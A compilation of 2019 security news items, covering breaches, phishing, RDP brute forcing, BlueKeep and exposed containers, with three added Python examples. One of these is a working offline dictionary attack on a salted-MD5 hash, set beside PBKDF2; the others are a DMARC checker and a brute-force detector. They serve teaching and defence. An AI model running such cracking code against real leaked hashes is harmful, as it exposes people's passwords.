“We know even less about this breach than most. We know the source of the database, and the fact that it exists, but there are no details about how the incident occurred,” said Tim Erlin, vice president of product management and strategy at Tripwire. "It’s been well understood that MD5 is insecure for more than a decade, and its weaknesses have been actively exploited. Despite these known issues, MD5 has persisted for a long time.”

“It would be extremely rare to see new applications making use of MD5 for secure hashing. The problem is that there are so many legacy systems out there, following the modernized adage ‘if it ain’t down, don’t touch it.’ Until these applications are replaced, or the underlying infrastructure stops supporting MD5, we’ll continue to see this type of persistence.”
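Why salted MD5 offers so little once a database like this is out, as an added example that is not the forum's code: the real hash construction is not given on the page, so this assumes md5(salt || password) with the salt stored beside the hash. The practical problem is throughput rather than MD5's collision weakness. An attacker who has the salt runs an offline dictionary attack at whatever rate the hash function allows, and a deliberately slow password hash (PBKDF2 here, because it is in the standard library; bcrypt, scrypt or Argon2 with a tuned work factor in production) cuts that rate by orders of magnitude for the same wordlist. The wordlist and the leaked row are constructed.

```python
import hashlib
import os
import time

# Constructed sample wordlist; a real attack uses millions of entries plus rules.
WORDLIST = ["password", "123456", "qwerty", "letmein", "dragon",
            "summer2018", "football", "iloveyou", "admin", "welcome"]


def salted_md5(salt, password):
    """Assumed leak format: md5(salt || password), salt stored beside the hash."""
    return hashlib.md5(salt + password.encode()).digest()


def slow_hash(salt, password, iterations=20_000):
    """Deliberately expensive alternative: PBKDF2-HMAC-SHA256 from the stdlib.
    Each guess costs `iterations` HMAC calls; production code would use
    bcrypt/scrypt/Argon2 with a higher work factor than this demo value."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def crack(target, salt, wordlist, hash_fn):
    """Offline dictionary attack. The salt is known, so it only defeats
    precomputed tables; the per-guess cost is set entirely by hash_fn."""
    for candidate in wordlist:
        if hash_fn(salt, candidate) == target:
            return candidate
    return None


def guesses_per_second(hash_fn, n=200):
    """Rough single-core guess rate for hash_fn on this machine."""
    salt = os.urandom(8)
    start = time.perf_counter()
    for i in range(n):
        hash_fn(salt, f"guess{i}")
    return n / (time.perf_counter() - start)


def cost_ratio():
    """How many times slower one PBKDF2 guess is than one salted-MD5 guess."""
    return guesses_per_second(salted_md5) / guesses_per_second(slow_hash, n=20)


# Constructed leaked row; the plaintext is used only to build the sample.
LEAK_SALT = b"a1b2c3"
LEAK_MD5 = salted_md5(LEAK_SALT, "summer2018")
LEAK_SLOW = slow_hash(LEAK_SALT, "summer2018")

if __name__ == "__main__":
    print("salted MD5 cracked:", crack(LEAK_MD5, LEAK_SALT, WORDLIST, salted_md5))
    print("PBKDF2 cracked:    ", crack(LEAK_SLOW, LEAK_SALT, WORDLIST, slow_hash))
    print(f"salted MD5 is about {cost_ratio():,.0f}x cheaper per guess than PBKDF2 here")
```

Both attacks succeed against a weak password in a ten-word list; the difference is that a GPU rig recovers most of a salted-MD5 dump in hours, while the same dump under a tuned slow hash costs thousands of times more per guess, which is the only protection a leaked database can still offer.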


Vectra Raises $100m in Series E Funding


After having experienced 104% growth in annual recurring revenue in 2018 over 2017, Vectra has today announced that it closed a $100 million funding round led by TCV, bringing the company’s total funding to date to more than $200 million, according to a June 10 press release.

The triple digit Series E funding, in which existing investors also participated, comes only one year after Vectra raised $36 million in Series D funding. The financing is expected to drive the company's growth and market expansion in what is estimated at a $12.7 billion cloud security market, according to Forrester Research.  

While critical security gaps leave organizations vulnerable, consumers continue to use online services for everything from entertainment to banking. Securing consumer data and preserving their privacy is critical to maintaining trust and preserving an organization’s reputation, a Vectra spokesperson said. The business impact of lost revenue and shareholder value as a result of consumer data breaches in the cloud are significant and are therefore making cloud security a board level priority.

“TCV has an extensive track record of partnering with enterprise security companies, including Rapid7 and Splunk, from growth stage to public,” said Tim McAdam, general partner at TCV and member of the Vectra board of directors. “In our research on the category, it became clear to us that Vectra was rapidly gaining momentum with customers by rethinking the way enterprises view both network and cloud security. The Vectra Cognito platform is poised to become requisite in the security infrastructure of multinational enterprises and midsize businesses alike.”

“The cloud has inherent security blind spots, making it imperative to eliminate cyber-risks as enterprises move their business to the cloud,” said Hitesh Sheth, president and chief executive officer at Vectra. “The Cognito platform enables them to stop hidden cyber-attacks in the cloud. We look forward to partnering with TCV and our existing investors as we continue our rapid growth.”

UK Taxpayers Overwhelmed with Phishing Scams


HMRC has received over 2.6m reports of phishing attempts over the past three financial years, according to a new Freedom of Information (FOI) request from a think tank.

The tax office processed a total of 2,602,528 reports of phishing emails and texts as well as phone scams from 2016-19, according to Parliament Street. Although the worst year was 2016-17 (921,900), 2018-19 saw an increase of 15% over the previous year to reach 897,649.

The largest number were fraudulent emails spoofing tax rebate messages, which accounted for 1,957,003 reports over the three years. The worst year for these was 2016-17, accounting for 733,980.

Next came scam SMS messages, which accounted for 150,009 over the past three financial years — although the volume of these has dropped by almost half between 2016-17 and 2018-19, according to the report.

The number of phone scams reported to the tax office has soared alarmingly over the period: from just 407 in 2016/17, to 104,774 reports in 2018/19.

The number of taxpayers who admitted disclosing financial details to the phishers was 10,647 in 2016-17, but then dropped considerably in the succeeding years, to total 18,792 for the three years. That equates to a success rate of less than 1%.

Also reassuring is the number of phishing websites being reported for removal: 50,323 over the three years, with 2017/18 being the worst year with 19,198 reports.

HMRC is said to be the government’s most abused ‘brand,’ but it has been getting better at combating the fraudsters, having implemented DMARC in 2016, for example. This has helped the agency block hundreds of millions of phishing emails that spoofed its own domains (DMARC does nothing against lookalike domains, which is where user reports and takedowns come in), while a Customer Protection Team works to follow up reports from taxpayers and take down phishing sites.
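What "implemented DMARC" means in concrete terms, as an added example that is neither HMRC's published record nor its tooling: a parser for the DMARC TXT record a domain publishes at _dmarc.<domain>, and a small assessment of whether the record actually enforces anything, since a p=none or sampled (pct below 100) record reports spoofing without stopping it. The sample records are constructed and the domain names are placeholders.

```python
POLICIES = ("none", "quarantine", "reject")


def parse_dmarc(record):
    """Parse a DMARC TXT record (RFC 7489 tag=value list) and apply the defaults
    a receiver would: pct=100, sp inherits p, relaxed alignment."""
    parts = [p.strip() for p in record.split(";") if p.strip()]
    if not parts or parts[0].replace(" ", "").lower() != "v=dmarc1":
        raise ValueError("record must begin with v=DMARC1")
    tags = {}
    for part in parts:
        name, sep, value = part.partition("=")
        if not sep:
            raise ValueError(f"malformed tag: {part!r}")
        tags[name.strip().lower()] = value.strip()
    policy = tags.get("p")
    if policy not in POLICIES:
        raise ValueError("p= must be none, quarantine or reject")
    sub_policy = tags.get("sp", policy)
    if sub_policy not in POLICIES:
        raise ValueError("sp= must be none, quarantine or reject")
    pct = int(tags.get("pct", "100"))
    if not 0 <= pct <= 100:
        raise ValueError("pct= must be between 0 and 100")

    def uris(value):
        return [u.strip() for u in value.split(",") if u.strip()]

    return {
        "p": policy, "sp": sub_policy, "pct": pct,
        "rua": uris(tags.get("rua", "")),      # aggregate report addresses
        "ruf": uris(tags.get("ruf", "")),      # forensic report addresses
        "adkim": tags.get("adkim", "r"), "aspf": tags.get("aspf", "r"),
    }


def assess_dmarc(record):
    """Return (verdict, notes). 'enforcing' means mail that fails SPF/DKIM
    alignment is quarantined or rejected across the whole domain tree."""
    d = parse_dmarc(record)
    notes = []
    if d["p"] == "none":
        verdict = "monitor-only"
        notes.append("p=none: spoofed mail is delivered and merely reported")
    elif d["pct"] < 100:
        verdict = "partial"
        notes.append(f"pct={d['pct']}: policy applied to a sample of failing mail only")
    elif d["sp"] == "none":
        verdict = "partial"
        notes.append("sp=none: subdomains can be spoofed freely")
    else:
        verdict = "enforcing"
    if not d["rua"]:
        notes.append("no rua= address: aggregate reports are not collected, so abuse goes unseen")
    return verdict, notes


def is_valid_dmarc(record):
    try:
        parse_dmarc(record)
        return True
    except ValueError:
        return False


# Constructed records with placeholder domains (not HMRC's published record).
SAMPLE_RECORDS = {
    "enforcing": "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.gov.uk; adkim=s; aspf=s",
    "monitor": "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.gov.uk",
    "sampled": "v=DMARC1; p=quarantine; pct=10",
    "subdomains-open": "v=DMARC1; p=reject; sp=none; rua=mailto:dmarc-reports@example.gov.uk",
    "broken": "p=reject; v=DMARC1",
}

if __name__ == "__main__":
    for name, rec in SAMPLE_RECORDS.items():
        print(name, "->", assess_dmarc(rec) if is_valid_dmarc(rec) else "invalid record")
```

A record only has effect if receivers evaluate it, and only for mail claiming the exact domain (or its subdomains) that publishes it; SPF and DKIM must already be in place for legitimate mail, or p=reject blocks the organization's own messages along with the phishers'.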

However, the wider business community may be less well protected, according to Centrify VP, Andy Heather.

“These incidents are just a snapshot of techniques used by hackers to gain confidential financial information as well as credentials and passwords. In many cases we’re seeing fraudsters gaining access to company data, using legitimate user ID and log-in details, without raising suspicion,” he argued.

“For businesses, it’s time to face the reality that cyber-attackers now no longer hack in, they log in using credentials and passwords that are weak, stolen or in cases of phishing are simply handed over to them. Tackling this problem means adopting a zero-trust approach to all user-accounts, ensuring every employee who tries to access critical information is screened with the necessary password, location and authentication procedures to ensure they are who they say they are.”

Microsoft Warns of Campaign Exploiting 2017 Bug


Microsoft has alerted users to a new campaign utilizing a vulnerability which was discovered and patched back in 2017 to download a backdoor Trojan to victim machines.

Spam emails have been detected in various European languages carrying malicious RTF attachments which feature an exploit for CVE-2017-11882, the computing giant said in a series of tweets on Friday.

“The CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks. Notably, we saw increased activity in the past few weeks. We strongly recommend applying security updates,” it said.

“In the new campaign, the RTF file downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload. The backdoor payload then tries to connect to a malicious domain that’s currently down.”

Although the domain in question is currently out-of-service, hackers may in the future update the attack to connect to a working C&C domain. This could enable the download of additional payloads, leading to infection with ransomware or banking Trojans, information-theft and more.

“Office 365 ATP detects the emails and attachments used in this campaign. Windows Defender ATP detects the documents as Exploit:O97M/CVE-2017-11882.AD and the payload as Trojan:MSIL/Cretasker,” Redmond’s security team concluded.

“Other mitigations, like attack surface reduction rules, also block the exploit.”

The flaw in question, a memory corruption bug in Microsoft Office’s Equation Editor, has been incredibly popular since it was discovered a couple of years ago because exploitation needs no macros and therefore triggers no security prompt: opening the document is enough.

It was used by APT34, an Iranian cyber espionage group, and just last week was spotted in attacks on central government targets delivering the Hawkball backdoor. It’s also been used to spread the infamous Cobalt malware and a RAT which uses the popular Telegram Messenger app for its command and control (C&C).

GoldBrute Campaign Brute Forces 1.6m RDP Servers


Researchers have uncovered a large brute forcing campaign targeting upwards of 1.5 million remote desktop protocol (RDP) servers.

Renato Marinho, chief research officer at Morphus Labs, revealed the so-called “GoldBrute” campaign is controlled by a single C&C server, with which bots are exchanging data via AES encrypted WebSocket connections to port 8333.

Infected hosts are first instructed to download the bot code: a large 80MB package that includes the complete Java Runtime.

“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot has reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot,” Marinho continued.

“Each bot will only try one particular username and password per target. This is possibly a strategy to fly under the radar of security tools as each authentication attempt comes from different addresses.”
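Marinho's one-guess-per-bot-per-target description is exactly the pattern a per-source lockout or threshold rule is blind to. The following added example, which is not Morphus Labs' code, shows the complementary detection over failed-logon records: it flags a host that draws a handful of attempts from many distinct sources inside one hour, with the conventional single-source rule beside it for contrast. The log format is a constructed, simplified stand-in for Windows event 4625 exports, the addresses are from the TEST-NET ranges, and the thresholds (20 sources, at most 2 attempts each, 1-hour buckets) are assumptions to tune per environment.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)


def parse_failed_logon(line):
    """Constructed line format (not a real Windows export), one event 4625 each:
    '<ISO time, UTC>|<target host>|<target account>|<source IP>'"""
    ts, host, user, src = line.strip().split("|")
    return {"time": datetime.fromisoformat(ts), "host": host, "user": user, "src": src}


def bucket_start(ts, window):
    """Align a timestamp to a fixed window boundary (naive UTC arithmetic)."""
    return EPOCH + ((ts - EPOCH) // window) * window


def detect_distributed_bruteforce(events, window=timedelta(hours=1),
                                  min_sources=20, max_per_source=2):
    """Flag a host that receives failed logons from many distinct sources, each
    contributing only a few attempts per window: the one-guess-per-bot pattern."""
    buckets = defaultdict(list)
    for e in events:
        buckets[(e["host"], bucket_start(e["time"], window))].append(e)
    alerts = []
    for (host, start), evs in sorted(buckets.items()):
        per_src = Counter(e["src"] for e in evs)
        low_and_slow = [s for s, n in per_src.items() if n <= max_per_source]
        if len(low_and_slow) >= min_sources:
            alerts.append({
                "host": host,
                "window_start": start,
                "distinct_sources": len(per_src),
                "attempts": len(evs),
                "accounts": sorted({e["user"] for e in evs}),
            })
    return alerts


def detect_single_source(events, window=timedelta(hours=1), threshold=5):
    """The conventional rule: one source, many failures. It catches a noisy
    attacker and misses GoldBrute, which is why both rules are needed."""
    counts = Counter((e["host"], e["src"], bucket_start(e["time"], window)) for e in events)
    return [{"host": h, "src": s, "window_start": w, "attempts": n}
            for (h, s, w), n in sorted(counts.items()) if n >= threshold]


def constructed_events():
    """Synthetic data: 25 bots make one guess each against srv01 over 38 minutes;
    one address makes six rapid guesses against srv02."""
    base = datetime(2019, 6, 7, 10, 0, 0)
    lines = [f"{(base + timedelta(seconds=96 * i)).isoformat()}|srv01|administrator|203.0.113.{i + 1}"
             for i in range(25)]
    lines += [f"{(base + timedelta(seconds=10 * i)).isoformat()}|srv02|administrator|198.51.100.7"
              for i in range(6)]
    return [parse_failed_logon(line) for line in lines]


if __name__ == "__main__":
    events = constructed_events()
    for alert in detect_distributed_bruteforce(events):
        print("distributed:", alert)
    for alert in detect_single_source(events):
        print("single-source:", alert)
```

Fixed buckets keep the example short; a production rule would use a sliding window so a campaign straddling the hour boundary is not split in two, and would key on the target account as well as the host, since GoldBrute-style campaigns concentrate on a few privileged usernames.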

Marinho claimed to have detected almost 1.6m targeted IP addresses from the C&C server — spread out across the world but located especially in Europe, the US and east Asia.

The news is a reminder that, despite the publicity around the BlueKeep RDP vulnerability, brute forcing is arguably a bigger threat today to administrators of these systems.

The NSA last week urged organizations to patch the remote code execution bug, CVE-2019-0708, warning that it could be wormable as it requires no human interaction to spread. Although exploitation has not yet been observed in the wild, it’s only a matter of time, experts claimed.

However, in the meantime, GoldBrute appears to be only just getting started.

“Shodan lists about 2.4 million exposed servers,” said Marinho. “GoldBrute uses its own list and is extending it as it continues to scan and grow.”

Sextortion Scammers Pose as Corrupt CIA Agents

In a new sextortion scam, cyber-criminals are posing as corrupt officials of the CIA and demanding $10,000 from their targets whose names they claim to have found in an investigation into online pedophiles, according to Kaspersky Lab.

Victims reportedly receive an email authored by what appears to be a corrupt CIA agent involved in “a large international operation set to arrest over 2,000 people suspected of pedophilia, in over 27 countries.”

The scope of the information the department reportedly has includes the victim’s name, phone number, and email, along with the person's home and work addresses. The scammer also claims that the CIA has information about relatives, which was reportedly obtained from a range of sources, including ISP, online chats and social networks, researchers said.

The note alleges that the victim’s contact details and those of their relatives are being held as part of the operation identified as case #45361978 (relating to possession and distribution of child pornography, or so it seems).

The fake agent offers to remove all files relating to the victim in return for a payment of $10,000 in cryptocurrency, but time is of the essence, as the letter also notes that arrests will begin in two weeks' time. As a result, the sextortion payment needs to be received in nine days of receiving the letter.

“Compared with regular sextortion spam, the 'CIA' message is well-written, with grammatically correct, stylistically restrained language in a quite official-sounding tone. The scammers also took care of the layout: The message text is nicely formatted and easy to read, and the effect is amplified by the CIA emblem staring out from the screen,” researchers wrote.

“However, just because the message looks more imposing doesn’t make it more true. Don’t be offended, but the CIA is unlikely to give a hoot about you. The scammers most likely found your email address in a database leaked online, or even just came across it by chance.”

Kaspersky recommends trashing any such messages immediately. “Our number one tip is don’t panic,” the researchers said. Beyond that, they advised that victims do not reply to the email and never consider paying a ransom to scammers.

New Adware Found in 200+ Google Play Apps

A new adware known as BeiTaAd was found embedded in 238 applications in the official Google Play store, which have been installed by 440 million Android users, according to security researcher Kristina Balaam of Lookout.

“BeiTaAd is a well-obfuscated advertising plug-in hidden within a number of popular applications in Google Play. The plug-in forcibly displays ads on the user’s lock screen, triggers video and audio advertisements even while the phone is asleep and displays out-of-app ads that interfere with a user’s interaction with other applications on their device,” Balaam wrote.

The ads displayed, which become visible at least 24 hours after the application is launched, are so pervasive that users impacted by the adware have reportedly been unable to answer calls or interact with other apps. Balaam said that on one of the Lookout test devices, the out-of-app ads did not appear until two weeks after the application, Smart Scan, was launched.

“There is a very fine – and, one could argue, diminishing – line between adware and malware. They exhibit similar behaviors for disseminating content and techniques for avoiding detection and analysis,” said Usman Rahim, digital security and operations manager for The Media Trust.

“Adware can also be vulnerable, as there is little to no incentive for developers to patch up the flaws, and can leak data. In the wrong hands, adware plug-ins can be used to distribute malicious code to commit theft and fraud on millions of users. Companies that monetize their apps by featuring ads must thoroughly vet their vendors and continuously monitor what these vendors do to users. The temptation for vendors to exploit access to users is great and can put developers at odds with current and forthcoming privacy regulations.”

Entrust Datacard Closes on Thales’ nCipher Security

Entrust Datacard announced today that it has completed its acquisition of Thales’ General Purpose Hardware Security Module (GP HSM) business, nCipher Security.

With this acquisition Entrust Datacard enhances its existing public key infrastructure (PKI) and SSL offerings, which the company says positions it to effectively secure customers’ sensitive information and business-critical applications as they implement new digital initiatives, particularly solutions using general purpose HSMs.

The hope is to better protect blockchain, crypto wallets and internet of things (IoT) manufacturing – some of the most vulnerable aspects of emerging business applications – and to help customers achieve compliance with stringent regulatory requirements such as the General Data Protection Regulation (GDPR) and electronic identification and trust services (eIDAS).

“We are extremely pleased to complete this acquisition and bring nCipher’s exceptional talent and technology into the Entrust Datacard portfolio,” said Todd Wilkinson, president and CEO of Entrust Datacard, in a press release.

“The need for secure network access and data integrity continues to multiply – from mobile devices and cloud services to connected IoT devices and digital payments. The use of HSMs is expanding across all of these domains. With nCipher now part of our solution portfolio, customers will see benefit from our expanded offerings for the most sensitive, high assurance use cases.”

For nCipher, the deal brings 300 employees in as part of the Entrust Datacard team and expands its authentication and cloud capabilities, and allows it to offer advanced solutions from Entrust Datacard’s secure hosting facilities. “nCipher is excited to join the talented Entrust Datacard team. This acquisition quickly expands the global footprint for nCipher solutions and accelerates our strategy for ‘as-a-service’ offerings,” said Cindy Provin, CEO of nCipher Security.

“HSMs provide a foundation of trust for business applications such as PKI, blockchain, mobile payments and code signing. As a single company, Entrust Datacard is positioned to effectively secure our customers’ sensitive information and business critical applications as they implement new digital initiatives.”

Researchers Find 40,000+ Containers Exposed Online

Researchers have discovered over 40,000 Kubernetes and Docker container hosting devices exposed to the public internet through misconfigurations.

Palo Alto Networks’ Unit 42 revealed the results of its latest research in a blog post yesterday. The discovery was made via a simple Shodan search.

Some 23,353 Kubernetes containers were found in this way, located mainly in the US, as well as Ireland, Germany, Singapore, and Australia. Even more (23,354) misconfigured Docker containers were discovered exposed to the internet, mainly in China, the US, Germany, Hong Kong and France.

“This does not necessarily mean that each of these 40,000+ platforms are vulnerable to exploits or even the leakage of sensitive data: it simply highlights that seemingly basic misconfiguration practices exist and can make organizations targets for further compromising events,” explained senior threat researcher, Nathaniel Quist.

“Seemingly simple misconfigurations within cloud services can lead to severe impacts on organizations.”

This has happened several times in the past: attackers exploited weak security configurations to steal keys and tokens for 190,000 Docker Hub accounts, while poor container security also led to a major breach of 13 million user records at Ladders.

Digging down into the exposed containers they found, the Palo Alto researchers discovered unprotected databases, in one case exposing multiple email addresses.

“Misconfigurations such as using default container names and leaving default service ports exposed to the public leave organizations vulnerable to targeted reconnaissance,” Quist concluded.

“Using the proper network policies, or firewalls can prevent internal resources from being exposed to the public internet. Additionally, investing in cloud security tools can alert organizations to risks within their current cloud infrastructure.”

Some 60% of US organizations experienced security incidents related to their use of containers over the previous year, according to research from Tripwire released in January.

GateHub Users Lose $9.7m to Hackers

Two cryptocurrency firms have come under attack over recent days with users of one, GateHub, suffering losses estimated at nearly $9.7m.

The cryptocurrency wallet service provider sounded the alarm in a statement on Thursday, claiming an investigation had been started after around 100 XRP Ledger wallets were compromised. The firm urged users to transfer their funds from these to a hosted wallet.

An XRP security community revealed in a separate post that, as of Wednesday, 23.2m XRP (Ripple) coins had been stolen, of which 13.1m had already been laundered.

However, the cause of the attack remains a mystery.

“API requests to the victim’s accounts were all authorized with a valid access token. There were no suspicious logins detected, nor were there any signs of brute forcing. We have however detected an increased amount of API calls (with valid access tokens) coming from a small number of IP addresses which might be how the perpetrator gained access to encrypted secret keys,” said GateHub.

“That, however, still doesn’t explain how the perpetrator was able to gain other required information needed to decrypt the secret keys. All access tokens were disabled on June 1 after which the suspicious API calls were stopped.”

The news comes as a separate digital currency platform managed to prevent a major theft of currency with some quick thinking.

Blockchain startup Komodo revealed it discovered an attack targeting its Agama wallet application. Hackers had uploaded malware to a supply chain provider’s software designed to steal cryptocurrency wallet seeds and other login passphrases.

“After discovering the vulnerability, our cybersecurity team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk,” Komodo said. “We were able to sweep around 8m KMD ($12.5m) and 96 BTC ($765K) from these vulnerable wallets, which otherwise would have been easy pickings for the attacker.”

Regulator Slams Cathay Pacific Over Breach

Two separate groups breached Cathay Pacific’s cyber-defenses over a four-year period, taking advantage of multiple failures in IT security, a damning new report from the Hong Kong privacy commissioner has found.

The first incident occurred in October 2014 when keylogging malware was placed on an internal system to harvest account credentials. The group used these to access Cathay’s IT system via a VPN to steal data, whilst also moving laterally to extract domain credentials from other parts of the network. This activity continued until 2018.

The second group exploited a flaw on an internet facing server back in 2017, enabling them to gain admin access, move laterally and install credential harvesting tools. These credentials were used to access data via a VPN until May 2018.

Although the exploited vulnerability was first published in 2007, the airline claimed it was unable to upgrade because of compatibility problems with an Airbus fleet manuals app.

However, a scan it ran in 2017 did not spot the bug, and Cathay also claimed that its anti-malware and endpoint protection tools didn’t spot any of the malware used in the second attack because there were no signatures available, the report revealed.

The incidents were finally uncovered when group two tried to brute force the firm in March 2018 and it brought a cybersecurity expert on board to investigate.

Four of Cathay’s 120 IT systems containing personal data were affected: a customer loyalty system, a shared back-end database used to support web apps, a reporting tool and an air miles database.

The privacy commissioner criticized the airline for multiple security failings, including: failing to identify the server flaw, scanning at too wide an interval (yearly), exposing the admin console port of the server to the internet, failing to apply multi-factor authentication for all users accessing IT systems containing personal data, generating unencrypted database backup files, failing to reduce malware risks after the 2017 incident and failing to have an effective personal data inventory.

“In all the relevant circumstances of the case in relation to personal data security, the commissioner finds that Cathay did not take all reasonably practicable steps to protect the affected passengers’ personal data against unauthorized access in terms of vulnerability management, adoption of effective technical security measures and data governance, contravening DPP 4(1) of Schedule 1 to the Ordinance,” the commissioner concluded.

The airline also kept Hong Kong ID card details of affected passengers for longer than was necessary, it said.

Some 9.4 million passengers were affected by the breach, which Cathay Pacific finally revealed in October 2018.

However, while all had their names stolen by attackers and most had flight number and date (61%) and email address (53%) compromised, far fewer had membership number (38%), address (24%), phone number (19%), nationality (12%), passport number (9%), date of birth (8%) and ID card number (6%) affected.

Just 0.004% had credit card details stolen, suggesting that the motivation for the attacks may have been non-financial, which could potentially indicate nation state involvement.

Healthcare Orgs Hit with Destructive Attacks

Increasingly, healthcare organizations are the target of cyber-criminals looking to profit from the treasure trove of personal data these companies possess, according to a new report from Carbon Black.

The Healthcare Cyber Heist in 2019 report surveyed industry CISOs to understand the ways that threats to the industry have evolved. A vast majority (83%) of healthcare organizations reported an increase in cyber-attacks over the past year. “Invariably, when we talk to these CISOs, almost all of them are saying that the number of relevant and actionable security alerts they are receiving continues to climb year over year,” the report stated.

In addition, 66% admitted they were the target of a ransomware attack in the past year. “In targeting healthcare organizations, ransomware attackers are taking advantage of the 'do no harm' principle. Meaning, when forced to decide between paying a ransom or being unable to access critical patient files, the healthcare provider has no choice – they have to pay, lest a patient potentially incur great harm or loss of life,” the report said.

While 66% of healthcare organizations reported that cyber-attacks have grown more sophisticated over the past year, 84% also said that they have provided cybersecurity best-practices training to their employees.

“The potential, real-world effect cyber-attacks can have on healthcare organizations and patients is substantial,” said Rick McElroy, Carbon Black’s head of security strategy, in a press release. “Cyber attackers have the ability to access, steal and sell patient information on the dark web. Beyond that, they have the ability to shut down a hospital’s access to critical systems and patient records, making effective patient care virtually impossible.”

Despite their healthcare organizations being the target of cyber-attacks, CISOs reported that their top security concerns are actually related to compliance (33%), budget and resource restrictions (22%), loss of patient data (16%), vulnerable devices (16%) and inability to access patient data (13%).

For nearly half (45%) of participating healthcare organizations, attacks were targeted and intended to cause an extensive destruction of data, the report said. “These attackers aren’t just committing simple burglary or even home invasion – they’re arsonists. These attacks are often carried out by punitive and malicious nation-states, including Russia, China and North Korea,” the report said.

NSA Warns Windows Users to Upgrade, STAT

Microsoft Windows administrators and users are being urged by the National Security Agency (NSA) to verify that they are using a patched and updated system in order to protect against cyber-threats.

In a June 4 advisory, the NSA referenced recent warnings by Microsoft of a potentially 'wormable' remote code execution vulnerability (CVE-2019-0708), dubbed “BlueKeep,” that could spread across the internet without user interaction.

Despite Microsoft having issued a patch, the NSA said that potentially millions of users remain vulnerable.

“We have seen devastating computer worms inflict damage on unpatched systems with wide-ranging impact, and are seeking to motivate increased protections against this Remote Desktop Services (RDS) on legacy versions of the Windows® operating system,” the advisory stated.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation tools are widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.”

While newer versions of Windows are reportedly protected against this vulnerability, several versions remain at risk if not patched, including: Windows XP, Windows 7, Windows Vista, Windows Server 2003, Windows Server 2008 and Windows Server 2008 R2.

In a May 14 blog post, Microsoft noted that it has not yet observed any exploitation of this vulnerability, though there is a high likelihood that “malicious actors will write an exploit for this vulnerability and incorporate it into their malware.” However, an anonymous researcher has already published a proof-of-concept (PoC).

“Businesses who fail to heed the NSA's warning ignore it at their peril. Anyone looking for evidence to justify patching or moving off of legacy systems need only look at the damage left in the wake of NotPetya and WannaCry,” said Rick Holland, CISO, vice president of strategy at Digital Shadows.

“Maersk's financial statements clearly show the potential costs of 'wormable' vulnerabilities. In the short term, businesses should isolate the systems that must run legacy software. More strategically, companies must have a plan to retire unsupported systems, even if it takes several years.”

Australian Police Collect 9K+ Docs in ABC Raid

Outrage over the Australian Federal Police (AFP) raid at the Australian Broadcasting Corporation (ABC) continues to mount as a question of national security versus freedom of the press plays out between journalists and law enforcement.

In response to allegations that ABC had published classified information related to stories reported in 2017, the AFP raided ABC’s headquarters in Sydney and seized several documents, according to John Lyons, executive editor at ABC news, who was allowed in the room as several police officers combed through thousands of emails.

“They have downloaded 9,214 documents. I counted them,” Lyons told ABC news in a live interview. “They have set up a huge screen and they are going through email by email. It’s quite extraordinary. I’ve never seen an assault on the media as savage as this one I’ve seen on ABC.”

“The AFP have the power now to be going through those documents and essentially deleting anything they want. They can change material,” said Lyons who live-tweeted events as they unfolded.

The news is the second raid on members of the press in Australia in less than 24 hours. Combined with the recently passed Assistance and Access Bill, also known as the anti-encryption law, these raids are especially troubling. “Australia is heading down a path that leads to its citizens not being able to speak freely nor privately,” said Paul Bischoff, privacy advocate with

“When members of the press are targeted by their own governments, it's important for journalists to step up their cybersecurity and protect sources. If you cannot depend on the law to protect press freedoms, then journalists must take care to secure their communications, notes, drafts, data, documents and other materials. Most importantly, they need to encrypt their phones and laptops, connect to reputable virtual private networks (VPNs) and use secure communication channels with end-to-end encryption.”

#Infosec19: Mitigating Risks and Managing Third Party Threats

Speaking at Infosecurity Europe 2019 on 'Effective Steps to Reduce Third Party Risk,' Scott W. Coleman, director of product management at Owl Cyber Defense, said that the average number of connections to a facility is 583. “Most are legitimate, but how many are appropriate?” he asked.

He said that there are “vendors and companies and entities who need access to your plant, enterprise or base” and while many have a good reason to have access, you need to be sure that they are not presenting a risk that you don’t need.

Coleman recommended determining what you need to protect, which connectors and disaster recovery systems you need to protect, and which vendor service level agreements you need to maintain “but be subversive on what needs to have access.”

He encouraged companies to focus on the following when evaluating a third party: which products and services require access; which companies have a higher level of personnel turnover; and which have been involved in breaches themselves, because “a lot of the time, a company has a third party connecting” and the risk then depends on that third party's own level of cybersecurity.

Looking at strategies for mitigation, Coleman asked how many people actually know who those 583 connections belong to and what access they have, and whether they have a good handle on what those parties are doing. “Understand and measure what they are doing as it is hard to protect against them,” he said.

Next, he recommended looking at what value and risk is presented and added to you by third party access, and apply resources to the highest risk and which assets are being touched. He said you should seek to reduce your footprint and the number of things you focus your resources on, and apply this posture to things the third parties affect.

“The bottom line is segmenting and least privilege,” he said. “The biggest problem is coming in laterally and if you put in segmentation and proper privilege, prevent movement and what all have access to.”

He said that the final way to mitigate is to use a zero trust approach, and the problem is that “trust but verify” is hard to achieve in practice. “The problem is when you take your eye off it, you no longer have the trust factor.”

He concluded by pointing to the Department of Homeland Security’s strategies for mitigating third party risk. These are recommended as:

  • Reduce/eliminate connections in/out the network
  • Convert two-way connections to one-way out of the plant
  • Convert two-way connections to one-way into the plant
  • Secure remaining two-way connections

#Infosec19: MITRE ATT&CK Framework Effective in Defending CNI

Speaking at Infosecurity Europe 2019 Andrew Habibi-Parker, director – professional services, EMEA & APJ at LogRhythm, explored security risks surrounding critical national infrastructure (CNI) and outlined why the MITRE ATT&CK Framework can be pivotal in defending and protecting critical infrastructures.

Habibi-Parker explained that there are some critical elements of national infrastructure, such as assets, facilities, systems and networks, which, in the event of a compromise, can be targeted by attackers to affect the integrity or delivery of essential services, resulting in significant impact on national security, national defense or the functioning of the state.

